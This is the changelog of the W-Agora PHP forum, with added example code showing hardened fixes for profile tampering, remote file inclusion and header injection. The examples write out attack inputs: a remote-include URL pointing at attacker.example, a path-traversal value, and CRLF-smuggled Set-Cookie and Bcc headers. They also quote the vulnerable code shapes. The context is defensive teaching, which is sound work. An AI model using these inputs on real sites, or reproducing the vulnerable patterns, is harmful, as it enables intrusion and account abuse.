$Id: ChangeLog,v 1.58 2006/07/11 23:04:38 mdruilhe Exp $
========================
W-Agora 4 : Change Log
========================
(+ : security fixes)
2006 July - Version 4.2.1
============================
o Enhancements / new features :
-------------------------------
* Localization:
- Hungarian translations (sohagabor)
* multiple wysiwyg editor support (currently htmlarea, tinymce and (almost complete) fckeditor)
* ability to send mails to:
- all moderators ($bn_mail = 2),
- all moderators and administrators ($bn_mail = 3),
- only the main moderator ($bn_mail = 1);
currently this must be set by hand in the forum configuration
o Fixes, code changes :
-----------------------
+ browse_avatar.php : fix Secunia Advisory SA17201 :
- force site to be selected in order to set allowed extensions,
- remove the file if the uploaded file is not an image.
+ extras/quicklist.php : fix Secunia Advisory SA17201 : sanitize site parameter
+ index.php : fix (minor) security bug with $site parameter
+ globals.inc : fix Secunia Advisory SA20779
* mail.php :
- fix bug in redirect (missing php extension)
* include/dbaccess.php :
- fix bad arguments in _openDB() call
- use new ListRenderer::displayList() parameters
- update user stats when a note / thread is deleted (RUSK)
* include/listrenderer.php :
- added getStartItem(), add parameters start & count in displayList()
- remove site parameter in URLs if not needed
- fix typo in $label_posted_by_on
* include/misc_func.php :
- added "object" in allowed tags
- some enhancements in getNavBar(), getListBox(), getListCheckBox(), minimum_phpversion()
- added "id" attribute in all generated form elements
- remove paragraph substitution in my_br2nl() to avoid annoying extra line feeds in preview
and emails
- added load_php_extension()
- change in kill_html() : prevent "raw" (entitized) HTML code from being converted in preview / edit mode
- anchor() : fix JavaScript error in links with ' in the text; added unhtmlentities()
* include/mail.php, include/misc_func.php :
- moved rfcDate() from mail.php to misc_func.php so that it can be used elsewhere
- renamed 'X-Posting-Client' header to more commonly used 'X-Originating-IP'
* RSS: various bug fixes and enhancements in rss.php
+ don't list hidden notes
- add RSS link in HTML header
- add $no_cookie option (don't send cookies to browser)
- get db parameters from site configuration file
- use HTTP authentication for private forums
- format RSS using XSL/CSS stylesheets
* various bug fixes in Phorum template
* init.inc, globals.inc :
- Fix "database error" in forums list if site database is different from main agora database
- properly set all variables before checking if user is active
- added new constant auth_required to force authentication in init.inc
- set full URI in HTTP redirections (header('Location: ...'))
- move "active user" checking after variables settings
- added $bn_doctype
- fix extra trailing slash bug in $bn_base_url
* editconf.php3, include/config.php3, init.inc :
- centralize db parameters in getDbaccess()
- site level configuration variables ($db*, usersource, directories) are now only
defined in site configuration file
* include/viewnote.php :
- add 'att_table' CSS class
* mimetypes handling (include/mimetypes.php3)
- XHTML compliance and use CSS in inline attachments rendering
* create_site.php, create_forum.php :
- some HTML4 cleanup (xhtml compliance)
- better error handling
- strip magic quotes in form fields
* admin_notes.php3 :
- fix bug preventing notes from being copied to an empty forum
* editlist.php3 :
- fix magic quote bug
* dbaccess.php, include/oci8.php, include/postgres65.php :
- truncate index name to 30 chars for OCI compatibility (hixcks)
- added alias for unknown "datetime" type
* include/mssql7.php3 :
- use mssql_get_last_message(),
- fix primary key syntax error
* include/adomsaccess.php3:
- fix warning in preg_match() line 55
* changes and Bug fixes in include/auth.php, register.php and profile.php:
- update login infos and increment login count if the user starts a new browser session
but has a permanent cookie set
- allow special characters in userid
- don't allow a user to take someone else's username when changing profile
- Ability to allow HTML in some user fields using $user_html_var[] array
- fix bug in input fields checking.
- fix bug with smileys in signature.
- Now smileys and URLs are expanded in details and signature fields
+ Security fixes:
- sanitize input fields + only defined fields are extracted
- No longer rely on userid variable: Only an authenticated user can change his own profile
- Check for permitted fields to be changed (disallow changing of sensitive fields
such as userpriv, lastlogin, ...)
- logout was not working if permanent cookie was set
* subscribe.php3
- changes in subscriptions list rendering, use CSS
* subscribe_thread.php3:
- don't allow guest users to subscribe anymore
* Enforce security in directories tools/ user/ conf/ and include/
- updated .htaccess (require valid-user)
- prevent directory listing
* Fixed some incompatibilities with new default settings in PHP5:
- use superglobals => "register_long_arrays = off" compatibility (default in PHP5)
- short_open_tag = off compatibility (default in PHP5)
- don't pass arguments by reference in some functions
* add "in-reply-to" header in emails
* made PHP code highlighting working with PHP versions prior to 4.2
* enhancements + bug fixes in search pattern highlighting
* view.php:
- add pg parameter (page num)
- don't increment hits count if note already seen by the same user
- don't lose "pattern" argument in pagination
- prevent hidden notes from being retrieved in next/previous thread
- don't show notes where hidden is <> 0 (values>1 can be used for advanced moderation purpose)
- adjust the page accordingly in the thread list even if $st not set
* include/dbstats.php3 1.3:
- fix database error in computeDailyUserStats() and computeDailyForumStats with mysql
- avoid duplicate entries in log_table_*
* user/http_user.php3 1.7:
- set "mail_ok" and "state" user fields properly
* stats/wa_bar_graph.php3:
- attempt to load gd extension if not already loaded
* locales/*_pl.inc
- Polish translation update from Bibok
* locales/*
- localize "download file ..." , added LABEL_DOWNLOAD, LABEL_DOWNLOAD_FILE now takes parameters
* tools/upgrade_42.php3:
- more SQL standard compliant, works with sites using different databases
- made alter table cross databases compatible
* list.php3, view.php3:
- set "view mode" (flat/thread) cookie at site level instead of forum level
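The 4.2.1 profile entries above (only defined fields extracted, a user may change only his own profile, sensitive fields such as userpriv and lastlogin not writable, no stealing another user's username) describe one pattern: walk an allow-list of fields rather than the request, and take the row id from the session. The following PHP is an added illustration of that pattern and is not W-Agora code; it uses PDO with an in-memory SQLite table for the demo, whereas W-Agora has its own dbaccess layer. The table and column names (users, userid, username, userpriv, ...), the $user_editable_fields list and the function names are assumptions for the example.

```php
<?php
// Added example, not W-Agora code: a profile update that follows the 4.2.1
// security entries. The row to update is taken from the authenticated session,
// only an allow-list of fields is read from the request, and privileged
// columns (userpriv, lastlogin, ...) can never be reached from the form.
// Table and column names are assumptions for the example.

// Fields a user may change about himself (assumed column names).
$user_editable_fields = array('username', 'useraddress', 'signature', 'details', 'homepage');

// Fields in which HTML is allowed ($user_html_var[] in the changelog); the rest are escaped.
$user_html_var = array('signature', 'details');

function sanitize_profile_input(array $request, array $editable, array $html_allowed) {
    $clean = array();
    foreach ($editable as $field) {      // walk the allow-list, never the request keys
        if (!array_key_exists($field, $request)) {
            continue;
        }
        $value = $request[$field];
        if (is_array($value)) {           // "select multiple" fields arrive as arrays
            $value = implode(',', $value);
        }
        if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
            $value = stripslashes($value); // undo magic quotes only when PHP added them
        }
        $value = str_replace(array("\r", "\n"), ' ', trim($value)); // no header smuggling via mails
        $clean[$field] = in_array($field, $html_allowed, true)
            ? $value                       // HTML permitted; kill_html() would still filter scripts
            : htmlspecialchars($value, ENT_QUOTES);
    }
    return $clean;
}

// Returns true on success, false if not authenticated, nothing to change,
// or the requested username belongs to someone else.
function update_own_profile(PDO $db, array $session, array $request, array $editable, array $html_allowed) {
    if (empty($session['is_authenticated']) || empty($session['userid'])) {
        return false;                     // only an authenticated user, and only his own row
    }
    $fields = sanitize_profile_input($request, $editable, $html_allowed);
    if (!$fields) {
        return false;
    }
    if (isset($fields['username'])) {     // refuse a username already taken by another user
        $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE username = ? AND userid <> ?');
        $stmt->execute(array($fields['username'], $session['userid']));
        if ((int) $stmt->fetchColumn() > 0) {
            return false;
        }
    }
    $set = array();
    $params = array();
    foreach ($fields as $col => $val) {   // $col comes from the allow-list, so interpolating it is safe
        $set[] = $col . ' = ?';
        $params[] = $val;
    }
    $params[] = $session['userid'];
    $stmt = $db->prepare('UPDATE users SET ' . implode(', ', $set) . ' WHERE userid = ?');
    return $stmt->execute($params);
}

// Constructed demo data: alice (userid 1) and a privileged admin (userid 2).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, useraddress TEXT,
           signature TEXT, details TEXT, homepage TEXT, userpriv INTEGER DEFAULT 0, lastlogin TEXT)');
$db->exec("INSERT INTO users (userid, username, userpriv) VALUES (1, 'alice', 0), (2, 'admin', 9)");
$session = array('is_authenticated' => true, 'userid' => 1);

// A hostile form submission: tries to rename itself to 'admin', to raise its own
// userpriv and to point the update at userid 2. userid and userpriv are not in
// the allow-list and are dropped; the rename is refused because 'admin' exists.
$request = array('userid' => 2, 'userpriv' => 9, 'username' => 'admin', 'signature' => '<b>hi</b>');
$first = update_own_profile($db, $session, $request, $user_editable_fields, $user_html_var);
$request['username'] = 'alice2';
$second = update_own_profile($db, $session, $request, $user_editable_fields, $user_html_var);
$row = $db->query('SELECT username, userpriv FROM users WHERE userid = 2')->fetch(PDO::FETCH_ASSOC);
printf("first: %s, second: %s, admin row: %s\n",
       var_export($first, true), var_export($second, true), var_export($row, true));
```

Run it with the php CLI: the first call is refused because the username is taken, the second succeeds, and the admin row still reads username admin, userpriv 9. The shape to avoid is extract($_POST) followed by a deny-list of "sensitive" names: it is the request that then decides which columns are written, and one forgotten name (or a later schema addition) reopens the hole.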
2005 April 18 - Version 4.2.0
==============================
o Enhancements / new features :
-------------------------------
* New registration mode :
- ability for users to choose a password at registration time (if enabled in register_form template)
- user validation at site level
* Emails enhancements
- Send emails in HTML + text/plain (Use new HTMLMimeMail class)
- Private emails (reserved to registered users)
- Ability to send attachments with emails (configurable at forum level)
* Subscription (mailing list) enhancements
- Ability for users to subscribe to / unsubscribe from several forums at one time
(use {subscribe_forums_list} in subscribe_form template)
- Ability to unsubscribe from threads (use new variable {subscribe_threads_list} in subscribe_form template)
* Pagination in forums and threads lists
* Avatars (configurable in globals.inc)
- ability to choose/upload an avatar
- ability to link an avatar from another website
- add 4 new variables to use in templates (register_form) :
$label_avatar, $show_picture, $label_change_avatar, $choose_picture_field
* Log / stats management
- For maintenance and performance reasons, the main log table can now be split into 4 tables
(one table per quarter) before being purged. This process is done automatically when calling
stats/index.php
- Daily and monthly stats are pre-calculated and held in 2 new tables, thus reducing
statistics computation time
- "register" actions are now logged
- views per forum / per users are now collected in the userforum table
* Database optimization
- debugging/profiling support (count SQL queries and execution time)
- Optimize some queries,
- Removed some unused outer joins
- create indexes where needed
* Admin / configuration
- Ability to execute some PHP instructions (bn_before_mail) before sending emails
- mass edit forums: Possibility to change settings (hide, lock, ...) on all forums at a time
- added ALLOWS_INFOS_URL in globals.inc => whether to allow url "index.php?info"
* RSS support:
- rss.php has been rewritten (2.0 compliance)
- allow RSS feeds at site level or at forum level
- now located in the w-agora top directory
* Localization:
- Handle dir and lang attribute in tag
- Hebrew translations (kobi bohbot)
* Miscellaneous:
- let user choose to email or not updated notes
- do not display e-mail address in templates => use {mail_url}, {mail_text}, {mail_link} in templates
- PHP 4.1 is now required
- Change license to GPL
o Fixes, code changes :
-----------------------
* style.css :
- style.css is now split into 2 CSS files (style.css + admin_style.css), included as the default CSS
(in display_header())
- some hardcoded styles have been moved to CSS
- new classes: new, hilite, msgbox ...
* include/config.php: fix bug (4.1.7) with backslashes and quotes if magic_quotes_gpc is On
+ include/misc_func : security fixes:
+ msgForm() (bug 4.1.7) prevent all variables from being passed on the query_string
+ prevent javascript/vbscript injection in posts
* include/misc_func : various bug fixes:
- strip_magic_quotes() now handles arrays
- fix 4.1.7 bug with registered_forums_list in register.php
* admin_subscribed_user.php: fix bug with mail sent confirmation message : use $m_to instead of $addresses
* removed htmlarea module (no longer supported). Will be replaced with a more flexible interface
supporting other wysiwyg editors (eg. FCKEditor, tinymce, ...)
* include/cookies.php : fix bug in cookie setting (form fields)
* include/dbaccess :
- add new functions :
getExecTime(), getSessionStats() : profiling
createIndex(), dropIndex(), addPrimaryKey() : indexes handling
getSite(): get site infos
- new parameter $pk in createTable()
* fileupload.php
- fix bug (make file upload working) with open_basedir restriction
- support PHP 4.2 error management
* New classes:
- ListRenderer (display lists)
- DBStats (logs/statistics functions)
* admin_notes.php:
- add pagination (navigation bar) + some bug fixes in moderation:
- a message that contains replies can now be unhidden, but still can't be hidden
- maintain current page while hiding/showing a message
- set properly default options in some listboxes
* admin_site.php:
- fix recursive frameset bug if bn is set when clicking "manage forums"
* admin_user.php3 :
- list only forums owned by user, except admin & root
* setup.php3:
- HTML 4.01 compliant
- More controls and error handling
- don't lose parameters while switching between advanced and basic modes
* profile.php, register.php :
- various bug fixes, HTML4/XHTML compliance,
- replaced php shorts tags
- replaced hard-coded messages with localized strings
- use checkbox widget
- add log entry
- fix 4.1.7 bug on {register_forums_list}
2004 October 19 - Version 4.1.7
================================
o Enhancements / new features :
-------------------------------
* auto-login feature (keepalive cookie)
For this to work, just add {keepalive_checkbox} in your login form.
* download_thread : add link to normal view + navigation bar (Laurent A.)
* added _FILEMODE constant in globals.inc (umask used to create files)
* add MAIL_CHECK_DNS constant in globals.inc (check DNS MX record while verifying email)
* add $bn_html_dir variable in globals.inc (html content direction, default left-to-right)
* full spanish translations (user side + admin panel)
* allows multiple values fields (select multiple) in user profile form (Karibou)
o Fixes, code changes :
-----------------------
+ 4.0x upgrade scripts: prevent possible remote file inclusion
(if .htaccess not taken into account)
+ fix possible remote include vulnerability in user/http_user (if .htaccess ignored)
+ fix various XSS vulnerability (include/auth.php, list.php, forgot_password.php, download_thread.php)
+ fix "HTTP Response Splitting" Vulnerability (subscribe_thread.php)
+ fix possible sql injection in quicklist.php
* misc_func::kill_quotes() => fix bug with new lines and
* edit_mail.php: fix wrong displayed label for mail_forgot_password field
* Fix typo (parse error) in affected_rows() in mssql7.php
* create_site:
- don't lose form data while switching between basic <-> advanced mode
- strip magic quotes according to PHP config (don't strip backslashes)
* Don't strip slashes in config variables causing MSSQL7 server name to be corrupted
* enhanced hits count algorithm (view.php): don't increment hits if the post is not older than 5 minutes
and comes from the same IP, or if the post has been made by the same userid
* quicklist.php :
- add noprint parameter : if set to 1 or true, then return the list as a string ($list)
instead of printing it out (Karibou)
- return to initial directory at the end of script
* misc_func::getListBox() => allows multiple default selected options (comma separated) (Karibou)
* forums registrations were lost if {register_forums_list} was not set in profile template -> fixed
* Don't display private forums in site statistics (dbaccess::getSiteStats)
* fix wrong PHP upload configuration detection
* fix invalid sql with auto increment in create table (mysql 4)
* username/useraddress were not set if the moderator doesn't fill in the fields in the form
* fix some url variables settings (viewnote.php)
* don't halt program in case of error updating admin password (change_password.php3)
* Upgrade htmlarea to 3.0-rc1
* Update user statistics when note is published after moderation (admin_notes.php3)
* Added some CSS classes: wa_link, wa_textfield
* users.php: don't list 'guest' user + some cosmetics changes
* mail feature:
- Better return-path handling using -f (David Horwitz)
- allow the expansion of variables in the bn_mail_from variable (David Horwitz)
* message posting, updating :
- fix bug in redirection causing $bn_no_thanks_msg to be ignored
- set full URI in redirect url
* better random password generating (include/auth.php)
* magic quotes handling
* fix bug on site templates editing (editform.php)
* user input was not saved into the cookie if the user is authenticated -> fixed
* file download : handle POST/GET parameters prior to PATH_INFO
(fix possible wrong PATH_INFO setting in CGI context)
* 4.0x upgrade scripts : fix bug preventing user from login
* Fix some messed up error messages
* Attachments are now sorted by id (creation time) while displayed in the message
* Fix bug in edit field panel : now allow "_" in field names
* download_forum : fix bug preventing threads from being displayed
* create_site : fix a possible table creation problem
(In some environments, PHP seems not to include newly created files properly)
* reorder_forums :
- fix an error with MS-SQL server (cecile*at*sdv.fr)
- correct error message
* fix regexp warning in cookies management
* Fix a warning in site listing if open_basedir restriction is On
* Fix some bugs in msgForm, better HTML entity support
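The 4.1.7 entries "4.0x upgrade scripts: prevent possible remote file inclusion (if .htaccess not taken into account)" and "fix possible remote include vulnerability in user/http_user (if .htaccess ignored)", like the "PHP include security fixes" of 4.1.6, concern the same class: an include() whose path is built from a request variable, or from a global that register_globals lets the request overwrite. The following PHP is an added illustration of the hardened shape and is not W-Agora code; the directory name, the module file names, $allowed_modules and the function names are assumptions for the example.

```php
<?php
// Added example, not W-Agora code: the "remote file inclusion if .htaccess is
// ignored" class fixed in the 4.0x upgrade scripts and user/http_user. The
// vulnerable shape is an include built from a request variable, or from a
// global that register_globals lets the request overwrite; with allow_url_fopen
// on (and, before PHP 5.2, no separate allow_url_include switch), a request
// such as ?dir=http://attacker.example/ pulls remote PHP into the script.
// The hardened version never includes a request-supplied string: a short key
// is mapped to a fixed file name and the resolved path must stay inside the
// include directory. Directory, file and function names here are assumptions.

// Vulnerable shape (do not use):
//   include($include_dir . '/' . $module . '.php3');   // $include_dir, $module may come from the request

define('WA_INCLUDE_DIR', __DIR__ . '/include');

// The only modules a request may ask for (assumed file names).
$allowed_modules = array(
    'auth'  => 'auth.php3',
    'mail'  => 'mail.php3',
    'stats' => 'dbstats.php3',
);

// Map a request key to an absolute path under $base_dir, or return null.
function resolve_module($key, array $allowed, $base_dir) {
    if (!is_string($key) || !isset($allowed[$key])) {
        return null;                                     // not on the allow-list
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $allowed[$key]);
    if ($base === false || $path === false) {
        return null;                                     // directory or file missing
    }
    // realpath() has resolved symlinks and '..'; require the file to sit under $base
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function load_module($key, array $allowed, $base_dir = WA_INCLUDE_DIR) {
    $path = resolve_module($key, $allowed, $base_dir);
    if ($path === null) {
        return false;
    }
    require_once $path;
    return true;
}

// Constructed demonstration: a scratch include directory with one real module.
$tmp = sys_get_temp_dir() . '/wa_rfi_demo_' . getmypid();
mkdir($tmp . '/include', 0700, true);
file_put_contents($tmp . '/include/auth.php3', "<?php function wa_demo_auth() { return 'auth loaded'; }\n");

var_dump(load_module('auth', $allowed_modules, $tmp . '/include'));                      // listed and present
var_dump(load_module('http://attacker.example/x', $allowed_modules, $tmp . '/include')); // not a key: never touched
var_dump(load_module('../../etc/passwd', $allowed_modules, $tmp . '/include'));          // not a key: never touched
var_dump(load_module('mail', $allowed_modules, $tmp . '/include'));                      // listed, but file missing
echo function_exists('wa_demo_auth') ? wa_demo_auth() : 'not loaded', "\n";

unlink($tmp . '/include/auth.php3');
rmdir($tmp . '/include');
rmdir($tmp);
```

Two caveats a practitioner would add to the changelog's own fix. A .htaccess "require valid-user" on include/ and tools/ (the 4.2.1 entry) only works where AllowOverride honours it, which is exactly the "if .htaccess ignored" case above; keeping include/ outside the document root, or having every script in it bail out unless a constant set by init.inc is defined, does not depend on the web server. And allow_url_include=Off (PHP 5.2+) plus register_globals=Off remove the remote half of the problem at the interpreter level, independently of any one script.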
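The 4.1.7 entries "fix HTTP Response Splitting Vulnerability (subscribe_thread.php)" and "set full URI in redirect url", together with the 4.1.6 mail fix "Remove possible extra line feeds in headers", share one rule: nothing that reaches a header line may contain a CR or LF. The following PHP is an added illustration of that rule and is not W-Agora code; $base_url, the header names used in the demo and the function names are assumptions for the example.

```php
<?php
// Added example, not W-Agora code: the header-injection fixes listed for
// 4.1.7 (HTTP response splitting in a redirect, full URI in Location:) and the
// related "remove possible extra line feeds in headers" mail fix. Every value
// that lands on a header line has CR/LF/NUL removed first; addresses and IPs
// are then validated rather than trusted. $base_url and the helper names are
// assumptions for the example.

// Vulnerable shape the 4.1.7 entry replaced (shown only for contrast):
//   header('Location: ' . $_GET['back']);
// A value like  list.php%0d%0aSet-Cookie:%20sid%3Dattacker  splits the response
// and lets the attacker append headers or even a second body.

function strip_header_newlines($value) {
    return str_replace(array("\r", "\n", "\0"), '', (string) $value);
}

// Build an absolute Location: value from the configured base URL and a
// site-relative path. Absolute and protocol-relative targets are refused so
// the parameter cannot be turned into an open redirect.
function build_redirect_url($base_url, $path) {
    $path = strip_header_newlines($path);
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $path) || substr($path, 0, 2) === '//') {
        return null;
    }
    return rtrim($base_url, '/') . '/' . ltrim($path, '/');
}

function safe_redirect($base_url, $path) {
    $url = build_redirect_url($base_url, $path);
    if ($url === null) {
        $url = rtrim($base_url, '/') . '/';   // fall back to the site root
    }
    header('Location: ' . $url);              // full URI, as the 4.1.7 entry requires
    exit;
}

// Mail headers: validate each address after stripping, and send the client
// address in X-Originating-IP (the header name 4.2.1 switched to).
function build_mail_headers($from, $reply_to, $client_ip) {
    $from = filter_var(strip_header_newlines($from), FILTER_VALIDATE_EMAIL);
    if ($from === false) {
        return false;                         // refuse to send rather than send a broken header
    }
    $headers = array('From: ' . $from);
    $reply_to = filter_var(strip_header_newlines($reply_to), FILTER_VALIDATE_EMAIL);
    if ($reply_to !== false) {
        $headers[] = 'Reply-To: ' . $reply_to;
    }
    $client_ip = filter_var(strip_header_newlines($client_ip), FILTER_VALIDATE_IP);
    if ($client_ip !== false) {
        $headers[] = 'X-Originating-IP: ' . $client_ip;
    }
    return implode("\r\n", $headers);
}

// Constructed inputs, as an attacker would send them:
$split   = "list.php?bn=test\r\nSet-Cookie: sid=attacker";
$smuggle = "user@example.org\r\nBcc: everyone@example.org";

var_dump(build_redirect_url('https://forum.example/', $split));            // one line, no second header
var_dump(build_redirect_url('https://forum.example/', 'http://evil.example/')); // refused: not site-relative
var_dump(build_mail_headers($smuggle, '', '203.0.113.7'));                  // stripped address no longer validates
var_dump(build_mail_headers('user@example.org', 'mod@example.org', "203.0.113.7\r\nBcc: x@example.org"));
```

Since PHP 5.1.2, header() itself refuses a value containing a newline, so the redirect half of this is belt and braces on a current interpreter; the 4.1.7 fix predates that, and the mail path still needs it because additional headers handed to mail() are concatenated as given. Note also that an injected address is rejected by validation, not silently repaired: once the CR/LF are gone, "user@example.orgBcc: everyone@example.org" is not an e-mail address, and the right outcome is to not send.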
2004 January 16 - Version 4.1.6a
================================
o Fixes, code changes :
-----------------------
* Numerous fixes in message post and wysiwyg editor handling:
- HTML cleanup (better htmlarea support)
- better browser version checking in htmlarea
- allow_html option was ignored if htmlarea used -> fixed
- Fix some bugs with recursive & encoding, line breaks and HTML entities conversion in form handling
- prevent some form field contents from being lost if JS is not enabled and a required field is missing
- fix bug causing the textarea contents to be lost while uploading the first file
* Enhancements in categories handling
- show categories in forums list
- Added link to category display in forums listing
- admin_categories: show category ids + ability to add a forum to a category
* Keep track of current list parameters while editing a user (admin_user.php)
* Set $is_authenticated and $is_moderator for potential use in templates (init_admin.inc)
* Fix SQL parsing error if optional whereclause is given in notes listing
* Fix parse error in delete.php
* Suppress warning output if ini_set has been disabled in php configuration
* New italian translations + fixes (Emanuele)
* Do not list private forums in forums select box
* Check "file_uploads" PHP option in configuration panel, and display a warning if the option is disabled
* Prevent $pattern to be lost in viewnote.php
* Fix $forums variable name collision in list.php (already defined in init.inc)
2003 December 10 - Version 4.1.6
================================
o Enhancements / new features :
-------------------------------
* New translations packages
- Czech (user part) (Tomas Kruta)
- Dutch (Joke Bekkering)
- Catalan (mac rac)
- Russian
* WYSIWYG editor (htmlarea component) integration in post/edit form
* Better attachments handling (see code changes) :
- Handle PHP code highlighting for PHP files.
- Dynamic resizing of embedded images (Emanuele)
- more embedded mime-types (video, sound) support
- Use PATH_INFO in attachments URLs: getfile.php/myforum/101/image.gif instead
of getfile.php?bn=myforum&att_id=101
* Several enhancements in emails management (see code changes)
* Added HTTP Basic authentication module
* Added "shared authentication" module (in extras/shared_user.php3) :
allow a site to share the same user database as another site. See usage instructions in
extras/shared_user.php3.
* Multi-site handling:
- added $default_site variable in globals.inc :
- Don't display the site list if only one active site is configured
* users ranking
* more options in user admin page :
- ability to subscribe, register and send emails to selected users
- Can change the password while editing user profile
- added missing fields in edit form
* Add threads sorting order feature (currently only mysql and postgres are supported) :
ability to sort threads by creation date | topic starter | subject | last updated date ...
* tools/load_users.php3: interactive form added, users File can now be uploaded, forums registration
* simplified setup process (with 2 modes : basic / advanced)
* ability to move/copy notes between threads/forums (Emanuele)
* complete rewrite of rss backend (tools/rss.php, contrib. from David Horwitz)
o Fixes, code changes :
-----------------------
+ XSS & PHP include security fixes :
- include/auth.php3
- editform.php3
- modules.php3
- index.php3
- insert.php3
- update.php3
- browse.php3
+ Removed tags in .htaccess because they potentially allowed POST or other requests
to activate scripts. Now all requests to the protected directory must be authorized (tbannist)
- bug fixes in default 'agorabb' and 'phorum' templates
- set bn_title if no forum selected (init.inc)
- Italian translations updates
- Gianni Pezzarini
- Emanuele
- Several fixes in tools/update_*.php3
- set user profile variables in preview mode (insert.php3, update.php3)
- login.php, logout.php : ability to redirect to an URL after login in/out
- display a message and exit program if cookie cannot be set in authenticate()
- moved wa_info() to wa_info.php (new).
- almost full rewriting of admin_subscribed_user.php3
- allow new TLD domains (eg .info) in email validation
- fix undefined variables in include/register_globals.php3
- create_site.php3: insert the owner (ie: if logged in as sys-admin but not 'admin') in the newly
created site
- attachments:
- determine mimetype from extension (if known) rather than browser setting
- added att_icon_multiple in mimetypes.php
- open default HTML link into a blank window
- message id (key) is no longer needed to access attachment from getfile.php (only att_id is required)
- mail management:
- send an email to the list when note is validated (switch from hidden to visible)
- set the recipient in the 'To:' header (rather than Bcc:) if there's only one user in the list
- set the recipients in the "To:" header (rather than Bcc:) if $bn_mail_to is not set.
- Remove possible extras Line feeds in headers.
- handle error if mail is sent to an empty moderators list
- mail template was not handled properly
- Fix some warnings in statistics pages
- Fix language detection bug (HTTP_ACCEPT_LANGUAGE not used properly)
- Fix language detection bug in setup/admin panel if no locale file exists for the selected language
- Fix before_access inclusion in various scripts
- do not show email in user list & profiles
- include/auth.php3: add last Visit timestamp in current session
- change_password.php3: fix header handling bug
- include/form.php3: don't set $mail_reply_box if replies are not allowed [Laurent A.]
- init.inc:
- added $logout_url, $logout_string, $logout_text in display_header()
- don't set {post_link} & {reply_link} if forum in readonly/inactive state.
- delete.php3: do not allow user to delete a note with replies
- update.php3: better password management in the post/edit form
- Fix bugs with hidden notes handling from moderation page
- insert.php3: Handle redirection by form if header(Location) doesn't work for some reason.
- globals.inc: adjust some PHP settings, fix problems with some configurations (yahoo hosting)
- browse.php3: Use mime-type icons in directory listings + display directories before files list
- include/viewnote.php3: display GUESTUSER_USERNAME properly
- include/viewnote.php3: set delete_link / edit_link according to user rights on the note
- profile.php3, register.php3:
- show private forums in register_forums_list, thus, allowing users
to register in a private forum. Just edit the variable $show_forums (in register.php3)
in order to restrict registration in private forums
- field $name was overwritten : fixed
- code cleanup
- allow registration even if a private forum is selected
- New/changed functions in misc_func.php
- getDBaccess() pass $site as argument instead of config. filename (RFU)
- beginForm() : add enctype parameter
- getPasswordField()
- getTextArea()
- customMenu(), getCustomMenu()
- getRadioButton(), getCheckBox() : add id +